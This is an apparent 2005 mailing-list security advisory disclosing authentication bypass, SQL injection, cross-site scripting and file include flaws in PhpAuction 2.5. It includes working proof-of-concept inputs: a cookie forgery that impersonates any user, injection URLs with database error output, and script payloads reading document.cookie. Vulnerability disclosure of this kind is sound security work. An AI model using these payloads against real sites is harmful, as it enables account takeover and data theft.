Dcrab 's Security Advisory
http://www.dbtech.org
Deadbolt = Computer=20 Technologies

******************************
SPECIAL BIRTHDAY=20 RELEASE, 18TH BIRTHDAY RELEASE FOR DIABOLIC CRAB, YOU CAN SEND EMAILS TO = DCRAB@HACKERSCENTER.COM
**= ****************************

Get Dcrab's Services to audit your Web = servers,=20 scripts, networks, etc or even code them. Learn more at http://www.dbtech.org

Severity: High
Title: [Bday Release] = PhpAuction=20 has Authentication Bypass, Multiple Sql injection, Cross Site Scripting = and File=20 Include vulnerabilities
Date: 8/07/2005

Vendor: PhpAuction
Vendor Website: = http://www.phpauction.org
Vendo= r Status:=20 Contacted but no reply
Summary: There are, Authentication Bypass, = Multiple=20 Sql injection, Cross Site Scripting and File Include vulnerabilities in=20 PhpAuction.

Proof of Concept Exploits:

Authentication bypass
Set the cookie as follows,
Name:=20 PHPAUCTION_RM_ID
VALUE: Id number of the user/admin you want to = impersinate=20 (you can get it from thier profile)
Access the website, and you'r = instantly=20 logged in as them ;)

/phpauction-gpl-2.5/adsearch.php?title=3D1&desc=3Don&closed=3D= on&category=3D'SQL_INJECTION&minprice=3D1&maxprice=3D1&pa= yment%5B%5D=3Don&payment%5B%5D=3Don&payment%5B%5D=3Don&paymen= t%5B%5D=3Don&seller=3D1&country=3DAfghanistan&ending=3D1&= SortProperty=3Dends&type=3D2&action=3Dsearch&go=3DGO%20%3E%3E=

Warning: mysql_fetch_assoc(): supplied argument is not a valid = MySQL result=20 resource in=20 /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/ad= search.php=20 on line 33

/viewnews.php?id=3D'SQL_INJECTION
Error: select * from = PROSITE_news where=20 id=3D\'SQL_INJECTION
You have an error in your SQL syntax. Check the = manual=20 that corresponds to your MySQL server version for the right syntax to = use near=20 '\'SQL_INJECTION' at line 1

/phpauction-gpl-2.5/index.php?lan=3D<script>alert(document.coo= kie)</script>
Cross=20 Site Scripting

/phpauction-gpl-2.5/profile.php?user_id=3D158&auction_id=3D<s= cript>alert(document.cookie)</script>
Cross=20 Site Scripting

/phpauction-gpl-2.5/profile.php?auction_id=3D<script>alert(doc= ument.cookie)</script>&id=3D159
Cross=20 Site Scripting

/phpauction-gpl-2.5/admin/index.php?lan=3D<script>alert(docume= nt.cookie)</script>
Cross=20 Site Scripting

/login.php?username=3D<script>alert(document.cookie)</scrip= t>
Cross=20 Site Scripting

/viewnews.php?id=3D<script>alert(document.cookie)</script&g= t;
Cross=20 Site Scripting

/phpauction-gpl-2.5/index.php?lan=3D../put/.inc.php/file/name/here

Warning:=20 main(/home/**********/********/public_html/phpauction-gpl-2.5/includes/me= ssages.../put/.inc.php/file/name/here.inc.php):=20 failed to open stream: No such file or directory in=20 /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/in= cludes/messages.inc.php=20 on line 34

Fatal error: main(): Failed opening required=20 '/home/**********/********/public_html/phpauction-gpl-2.5/includes/messag= es.../put/.inc.php/file/name/here.inc.php'=20 (include_path=3D'.:/usr/local/lib/php') in=20 /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/in= cludes/messages.inc.php=20 on line 34

/phpauction-gpl-2.5/admin/index.php?lan=3D../put/.inc.php/file/n= ame/here

Keep your self updated, Rss feed at: http://digitalparadox.org/rss.a= h and=20 at http://www.hackerscenter.com

Author:
These vulnerabilities have been found and released by = Diabolic=20 Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel = free to=20 contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com = or http://www.dbtech.org/. Lookout for = my soon to=20 come out book on Secure coding with php.

Sincerely,
Diabolic Crab

------=_NextPart_000_0009_01C58325.6436F8C0--